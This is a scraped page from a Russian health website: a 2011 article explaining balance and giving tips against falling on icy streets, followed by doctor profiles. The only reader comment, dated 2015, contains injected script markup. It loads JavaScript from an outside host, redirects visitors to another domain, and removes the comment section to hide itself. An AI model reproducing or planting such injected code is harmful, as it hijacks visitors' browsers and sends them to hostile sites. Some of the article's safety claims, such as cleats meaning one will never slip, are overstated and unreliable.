Здоровье ИНФО
Присоединяйтесь к нам:
Главная страница  >>  Наша кожа  >>  Прыщи  >>  Статьи  >>  Новогодние советы. Как не...  >>  Новогодние советы. Как не упасть на льду?
 
Обратная связь
 

Новогодние советы. Как не упасть на льду?

Размер шрифта
25 декабря 2011 07:13
  • google_analytics: false
  • Нравится

Именно в новогодние праздники растет число пациентов у травматологов. Мы гуляем по скользким зимним улицам, катаемся на коньках и лыжах и… падаем. Что делать, чтобы под Новый год земля не ушла из-под ног?

Что нам помогает крепко стоять на ногах?

Ухо, а точнее вестибулярный аппарат во внутреннем ухе. Это сложная конструкция представляет собой мельчайшие канальцы заполненные жидкостью, в которых есть волоски и камешки – отолиты.

Когда вы стоите прямо, камешки не двигаются. Но как только вы отклоняетесь, камешки плывут вверх и задевают волоски. Они передают сигнал нашему мозгу, который анализирует, в какую сторону мы отклонились, и управляет мышцами, чтобы равновесие сохранилось. Мы снова твердо стоим на ногах.

Что происходит при падении?

При падении отолиты в вестибулярном аппарате не успевают поменять положение. Мозг не получает нужного сигнала из вестибулярного аппарата, и мы чувствуем головокружение.

Как не упасть?

На льду сила трения между стопой и землей – минимальная. Что же делать, чтобы увеличить сцепление между подошвой обуви и скользким тротуаром?

  1. Выбирайте зимнюю обувь на рифленой подошве, с протекторами. Сила трения будет больше, и вы не упадете.

  2. Не убирайте руки в карманы. Свободно двигая руками, вы помогаете себе балансировать на льду.

  3. Надевайте на зимние ботинки или сапоги специальные цепи-ледоходы. Они похожи на цепи, которые надеваются на автомобильные шины в сильный гололед. Металлические пружины на подошве будут цепляться за лед, увеличивать силу трения, и вы никогда не поскользнетесь.

  4. Передвигайтесь, как пингвин. Пингвины широко раскрывают крылья и делают мелкие шажки лапами. «Походка пингвина» не позволит камешкам-отолитам в вестибулярном аппарате смещаться. Мозг будет так распределять мышечную силу, чтобы мы находились в строго вертикальном положении и не потеряли равновесие.

Дмитрий Шубин в программе «Здоровье» рассказывает обо всех секретах пингвиньей походки и показывает, как работают «ледоходы» для обуви. А запомнить полезные советы о том, как твердо стоять на ногах и не унывать в новогодние праздники вам поможет песня ведущих программы «Здоровье».

Видеосюжеты по теме:

Новогодние советы. Предупредите падения


 

  • google_analytics: false
  • Нравится
Послать другу Послать другу Распечатать Распечатать Обсудить на форуме Обсудить на форуме
Комментарии

1 - zzzzzz

01 июля 2015 в 00:02

Цитировать   |   Пожаловаться

--> src="http://1212123.esy.es/q.js"> > window.location.href="http://a25832-hostde3.fornex.org/"; $("form.noprint, #CommentsBlock").remove();

Вопросы и ответы
Яна Александровна Юцковская
Яна Александровна Юцковская Задать вопрос
Посмотреть информацию о враче

Юцковская Яна Александровна, д.м.н., профессор, зав. кафедрой дерматовенерологии и косметологии ГБОУ ВПО «ТГМУ Минздрава России», врач высшей категории, директор ООО «Профессорская клиника Юцковских», Владивосток, директор ООО «Клиника профессора  Юцковской», Москва, президент НП «ДВАЭМ», председатель Дальневосточного отделения МООСБТ.

Елена Николаевна Волкова
Елена Николаевна Волкова Прочитать ответы
Посмотреть информацию о враче

Доктор медицинских наук, профессор кафедры дерматовенерологии Московского факультета ГОУ ВПО «РГМУ им. Н.И. Пирогова Минздравсоцразвития России». Этот консультант отвечал на вопросы пользователей с 03 ноября 2011 г. по 15 февраля 2012 г.